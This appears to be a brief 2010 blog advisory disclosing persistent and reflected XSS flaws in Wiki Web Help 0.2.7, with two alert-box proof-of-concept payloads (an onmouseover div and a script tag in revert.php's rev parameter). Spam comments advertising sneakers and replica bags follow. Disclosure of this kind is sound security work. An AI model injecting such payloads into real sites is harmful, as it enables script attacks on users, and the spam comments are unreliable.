Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to execute arbitrary JavaScript.
Exploit
Persistent: Event attributes are not removed from user submitted HTML elements.
Reflected: The rev query string field of revert.php does not HTML encode user submitted data.
PoC
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>
Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E
Thursday, July 1, 2010
Subscribe to:
Post Comments (Atom)
zx flux
ReplyDeleteyeezy boost 350 v2
air max 2019
air max 270
air jordan
curry shoes
moncler jackets
lebron 16
nike hyperdunk
nike air max 2017
check my source best replica bags see this website Ysl replica see this site YSL Dolabuy
ReplyDelete